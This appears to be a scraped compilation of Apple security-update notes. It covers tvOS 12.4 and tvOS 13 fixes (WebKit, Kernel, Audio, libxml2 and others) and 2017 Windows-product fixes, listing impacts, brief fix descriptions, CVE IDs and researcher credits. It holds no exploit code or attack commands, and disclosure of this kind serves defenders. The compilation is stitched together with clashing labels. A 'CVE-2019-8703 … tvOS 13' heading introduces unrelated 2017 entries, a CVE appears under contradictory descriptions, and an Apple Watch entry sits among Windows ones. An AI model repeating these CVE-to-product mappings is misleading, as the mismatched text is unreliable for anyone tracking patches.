
Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management.

CVE-2019-8649: Sergei Glazunov of Google Project Zero

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8658: akayn working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8644: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8666: Zongming Wang (王宗明) and Zhe Jin (金哲) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd.

CVE-2019-8669: akayn working with Trend Micro's Zero Day Initiative

CVE-2019-8671: Apple

CVE-2019-8672: Samuel Groß of Google Project Zero

CVE-2019-8673: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8676: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8677: Jihui Lu of Tencent KeenLab

CVE-2019-8678: Anthony Lai (@darkfloyd1014) of Knownsec, Ken Wong (@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a) of Theori, Johnny Yu (@straight\_blast) of VX Browser Exploitation Group, Chris Chan (@dr4g0nfl4me) of VX Browser Exploitation Group, Phil Mok (@shadyhamsters) of VX Browser Exploitation Group, Alan Ho (@alan\_h0) of Knownsec, Byron Wai of VX Browser Exploitation, P1umer of ADLab of Venustech

CVE-2019-8679: Jihui Lu of Tencent KeenLab

CVE-2019-8680: Jihui Lu of Tencent KeenLab

CVE-2019-8681: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8683: lokihardt of Google Project Zero

CVE-2019-8684: lokihardt of Google Project Zero

CVE-2019-8685: akayn, Dongzhuo Zhao working with ADLab of Venustech, Ken Wong (@wwkenwong) of VXRL, Anthony Lai (@darkfloyd1014) of VXRL, and Eric Lung (@Khlung1) of VXRL

CVE-2019-8686: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8687: Apple

CVE-2019-8688: Insu Yun of SSLab at Georgia Tech

CVE-2019-8689: lokihardt of Google Project Zero

Entry updated September 11, 2019

CVE-2019-8702: About the security content of tvOS 12.4

This issue was addressed with improved entitlements. This issue is fixed in watchOS 6, tvOS 13, macOS Catalina 10.15, iOS 13. An application may be able to gain elevated privileges.

Released September 24, 2019

**AppleFirmwareUpdateKext**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2019-8747: Mohamed Ghannam (@\_simo36)

Entry added October 29, 2019

**Audio**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8706: Yu Zhou of Ant-Financial Light-Year Security Lab

Entry added October 29, 2019

**Audio**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted audio file may disclose restricted memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8850: Anonymous working with Trend Micro Zero Day Initiative

Entry added December 4, 2019

**CFNetwork**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: This issue was addressed with improved checks.

CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland

Entry added October 29, 2019

**CoreAudio**

Available for: Apple TV 4K and Apple TV HD

Impact: Playing a malicious audio file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added November 6, 2019

**CoreCrypto**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a large input may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2019-8741: Nicky Mouha of NIST

Entry added October 29, 2019

**CoreAudio**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted movie may result in the disclosure of process memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added October 8, 2019

**Foundation**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8746: natashenka and Samuel Groß of Google Project Zero

Entry added October 29, 2019

**IOUSBDeviceFamily**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8718: Joshua Hill and Sem Voigtländer

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to gain elevated privileges

Description: This issue was addressed with improved entitlements.

CVE-2019-8703: an anonymous researcher

Entry added March 16, 2021

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2019-8740: Mohamed Ghannam (@\_simo36)

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A local app may be able to read a persistent account identifier

Description: A validation issue was addressed with improved logic.

CVE-2019-8809: Apple

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8712: Mohamed Ghannam (@\_simo36)

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to determine kernel memory layout

Description: A memory corruption issue existed in the handling of IPv6 packets. This issue was addressed with improved memory management.

CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8709: derrek (@derrekr6) derrek (@derrekr6)

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8717: Jann Horn of Google Project Zero

Entry added October 8, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to determine kernel memory layout

Description: The issue was addressed with improved permissions logic.

CVE-2019-8780: Siguza

Entry added October 8, 2019

**Keyboards**

Available for: Apple TV 4K and Apple TV HD

Impact: A local user may be able to leak sensitive user information

Description: An authentication issue was addressed with improved state management.

CVE-2019-8704: 王 邦 宇 (wAnyBug.Com) of SAINTSEC

**libxml2**

Available for: Apple TV 4K and Apple TV HD

Impact: Multiple issues in libxml2

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8749: found by OSS-Fuzz

CVE-2019-8756: found by OSS-Fuzz

Entry added October 8, 2019

**libxslt**

Available for: Apple TV 4K and Apple TV HD

Impact: Multiple issues in libxslt

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8750: found by OSS-Fuzz

Entry added October 29, 2019

**mDNSResponder**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker in physical proximity may be able to passively observe device names in AWDL communications

Description: This issue was resolved by replacing device names with a random identifier.

CVE-2019-8799: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universität Darmstadt

Entry added October 29, 2019

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted text file may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2019-8745: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added October 8, 2019

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8831: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added November 18, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8625: Sergei Glazunov of Google Project Zero

CVE-2019-8719: Sergei Glazunov of Google Project Zero

CVE-2019-8764: Sergei Glazunov of Google Project Zero

Entry added October 8, 2019, updated October 29, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8707: an anonymous researcher working with Trend Micro's Zero Day Initiative, cc working with Trend Micro Zero Day Initiative

CVE-2019-8710: found by OSS-Fuzz

CVE-2019-8726: Jihui Lu of Tencent KeenLab

CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of ABLY Corporation

CVE-2019-8733: Sergei Glazunov of Google Project Zero

CVE-2019-8734: found by OSS-Fuzz

CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin Group

CVE-2019-8751: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8752: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8763: Sergei Glazunov of Google Project Zero

CVE-2019-8765: Samuel Groß of Google Project Zero

CVE-2019-8766: found by OSS-Fuzz

CVE-2019-8773: found by OSS-Fuzz

Entry added October 8, 2019, updated October 29, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A validation issue was addressed with improved logic.

CVE-2019-8762: Sergei Glazunov of Google Project Zero

Entry added November 18, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2020-9932: Dongzhuo Zhao working with ADLab of Venustech

Entry added July 28, 2020

**Wi-Fi**

Available for: Apple TV 4K and Apple TV HD

Impact: A device may be passively tracked by its Wi-Fi MAC address

Description: A user privacy issue was addressed by removing the broadcast MAC address.

CVE-2019-8854: Ta-Lun Yen of UCCU Hacker and FuriousMacTeam of the United States Naval Academy and the Mitre Cooperation

Entry added December 4, 2019

CVE-2019-8703: About the security content of tvOS 13

A null pointer dereference was addressed with improved validation. This issue is fixed in macOS High Sierra 10.13, iCloud for Windows 7.0, watchOS 4, iOS 11, iTunes 12.7 for Windows. Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution.

Released September 12, 2017

**CFNetwork**

Available for: Windows 7 and later

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2017-13829: Niklas Baumstark and Samuel Gro working with Trend Micro's Zero Day Initiative 

CVE-2017-13833: Niklas Baumstark and Samuel Gro working with Trend Micro's Zero Day Initiative

Entry added November 10, 2017

**ImageIO**

Available for: Windows 7 and later

Impact: Processing a maliciously crafted image may lead to a denial of service

Description: An information disclosure issue existed in the processing of disk images. This issue was addressed through improved memory management.

CVE-2017-13831: Glen Carmichael

Entry added October 31, 2017, updated November 10, 2017

**libxml2**

Available for: Windows 7 and later

Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2017-9049: Wei Lei and Liu Yang - Nanyang Technological University in Singapore

Entry added October 18, 2018

**libxml2**

Available for: Windows 7 and later

Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2017-7376: an anonymous researcher

CVE-2017-5130: an anonymous researcher

Entry added October 18, 2018

**libxml2**

Available for: Windows 7 and later

Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2017-9050: Mateusz Jurczyk (j00ru) of Google Project Zero

Entry added October 18, 2018

**libxml2**

Available for: All Apple Watch models

Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution

Description: A null pointer dereference was addressed with improved validation.

CVE-2018-4302: Gustavo Grieco

Entry added October 18, 2018

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed through improved input validation.

CVE-2017-7081: Apple

Entry added September 25, 2017

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2017-7087: Apple

CVE-2017-7091: Wei Yuan of Baidu Security Lab working with Trend Micro’s Zero Day Initiative

CVE-2017-7092: Samuel Gro and Niklas Baumstark working with Trend Micro's Zero Day Initiative, Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team

CVE-2017-7093: Samuel Gro and Niklas Baumstark working with Trend Micro’s Zero Day Initiative

CVE-2017-7094: Tim Michaud (@TimGMichaud) of Leviathan Security Group

CVE-2017-7095: Wang Junjie, Wei Lei, and Liu Yang of Nanyang Technological University working with Trend Micro’s Zero Day Initiative

CVE-2017-7096: Wei Yuan of Baidu Security Lab

CVE-2017-7098: Felipe Freitas of Instituto Tecnológico de Aeronáutica

CVE-2017-7099: Apple

CVE-2017-7100: Masato Kinugawa and Mario Heiderich of Cure53

CVE-2017-7102: Wang Junjie, Wei Lei, and Liu Yang of Nanyang Technological University

CVE-2017-7104: likemeng of Baidu Secutity Lab

CVE-2017-7107: Wang Junjie, Wei Lei, and Liu Yang of Nanyang Technological University

CVE-2017-7111: likemeng of Baidu Security Lab (xlab.baidu.com) working with Trend Micro's Zero Day Initiative

CVE-2017-7117: lokihardt of Google Project Zero

CVE-2017-7120: chenqin (陈钦) of Ant-financial Light-Year Security Lab

Entry added September 25, 2017

**WebKit**

Available for: Windows 7 and later

Impact: Cookies belonging to one origin may be sent to another origin

Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed by no longer returning cookies for custom URL schemes.

CVE-2017-7090: Apple

Entry added September 25, 2017

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: Application Cache policy may be unexpectedly applied.

CVE-2017-7109: avlidienbrunn

Entry added September 25, 2017

Tag

#ios